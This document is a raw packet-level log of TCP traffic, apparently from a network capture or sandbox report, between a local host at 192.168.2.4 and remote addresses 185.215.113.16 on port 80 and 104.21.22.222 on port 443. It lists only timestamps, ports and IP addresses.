Dec 14, 2024 12:56:16.770948887 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.771018982 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.771054983 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.771110058 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.772545099 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.772620916 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.772659063 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.772717953 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.774059057 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.774120092 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.774179935 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.774243116 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.775583982 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.775645018 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.775686979 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.775743961 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.777142048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.777203083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.777337074 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.777395010 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.778690100 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.778759003 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.778801918 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.778856993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.780364037 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.780421972 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.780538082 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.780595064 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.782458067 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.782516003 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.782587051 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.782640934 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.783850908 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.783910036 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.783925056 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.783983946 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.785202980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.785264015 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.785264015 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.785319090 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.786736965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.786798954 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.786997080 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.787055016 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.788471937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.788532972 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.788635969 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.788692951 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.789931059 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.789983988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.789990902 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.790047884 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.902426958 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.902518988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.902709961 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.902781963 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.903156042 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.903228998 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.903357029 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.903423071 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.904467106 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.904532909 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.904532909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.904598951 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.905838966 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.905950069 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.905992031 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.906059027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.907238960 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.907303095 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.907402992 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.907464981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.908380032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.908444881 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.908489943 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.908550024 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.909430981 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.909512043 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.909547091 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.909603119 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.910742044 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.910804033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.910844088 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.910897017 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.912098885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.912169933 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.912203074 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.912281990 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.913363934 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.913377047 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.913434982 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.914561987 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.914628983 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.914673090 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.914736032 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.915874004 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.915961027 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.915966034 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.916013002 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.917179108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.917243958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.917989016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.918046951 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.918461084 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.918519020 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.918560028 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.918621063 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.919754982 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.919820070 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.919861078 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.919914007 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.921071053 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.921128988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.921169996 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.921230078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.922337055 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.922415018 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.922446012 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.922511101 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.923755884 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.923827887 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.924025059 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.924089909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.925184965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.925204039 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.925252914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.925302029 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.926271915 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.926337004 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.926363945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.926419973 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.927525997 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.927593946 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.927613020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.927674055 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.928829908 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.928894043 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.928939104 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.928999901 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.930110931 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.930185080 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.930223942 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.930288076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.931427956 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.931492090 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.931538105 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.931603909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.932708979 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.932780981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.932881117 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.932959080 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.933218956 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:16.933315992 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:16.934055090 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.934114933 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.934115887 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.934174061 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.935338974 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.935408115 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:16.935409069 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.935430050 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.935437918 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:16.935496092 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.935832977 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:16.936625004 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.936717033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.936743975 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.936816931 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.937903881 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.937922001 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:16.937972069 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.938009977 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.938052893 CET	49783	443	192.168.2.4	104.21.22.222
Dec 14, 2024 12:56:16.938096046 CET	443	49783	104.21.22.222	192.168.2.4
Dec 14, 2024 12:56:16.938103914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.939203024 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.939286947 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.939326048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.939377069 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.940502882 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.940556049 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.940597057 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.940665007 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.941798925 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.941934109 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.941967964 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.941999912 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.943097115 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.943157911 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.943195105 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.943243027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.944389105 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.944456100 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.944479942 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.944534063 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.945658922 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.945713043 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.945775986 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.945833921 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.946959019 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.947015047 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.947051048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.947108984 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.948272943 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.948396921 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.948499918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.948499918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.949579000 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.949644089 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.949681044 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.949738979 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.950866938 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.950957060 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.951059103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.951059103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.952249050 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.952311993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.952374935 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.952431917 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.953460932 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.953531027 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.953629971 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.953689098 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.954737902 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.954801083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.954864025 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.954930067 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.956053019 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.956115961 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.956151009 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.956202030 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.957348108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.957505941 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.957540989 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.957570076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.958648920 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.958714008 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.958748102 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.958801031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.959939957 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.960035086 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.960067034 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.960120916 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.961246967 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.961313963 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.961337090 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.961397886 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.962523937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.962598085 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.962686062 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.962742090 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.963821888 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.963882923 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.963920116 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.963978052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.965339899 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.965401888 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.965440035 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.965490103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.966408968 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.966463089 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.966569901 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.966631889 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.967709064 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.967767000 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.967809916 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.967863083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.968996048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.969053030 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.969125032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.969185114 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:16.970283031 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:16.970336914 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.093723059 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.093756914 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.093976021 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.093976974 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.094204903 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.094337940 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.094372988 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.094461918 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.095058918 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.095211029 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.095237970 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.095366955 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.096251965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.096313000 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.096358061 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.096411943 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.097421885 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.097487926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.097493887 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.097548008 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.098628998 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.098695993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.098737955 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.098799944 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.099816084 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.099879980 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.099942923 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.100003958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.101012945 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.101077080 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.101140022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.101217985 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.102236032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.102299929 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.102356911 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.102421045 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.103460073 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.103537083 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.103642941 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.104537010 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.104609966 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.104640961 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.104698896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.105694056 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.105761051 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.105797052 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.105830908 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.106920004 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.106981993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.107069016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.107127905 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.108139992 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.108211040 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.108251095 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.108309031 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.109293938 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.109353065 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.109431028 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.109488964 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.110528946 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.110603094 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.110614061 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.110677004 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.111711025 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.111771107 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.111821890 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.111886024 CET	49778	80	192.168.2.4	185.215.113.16
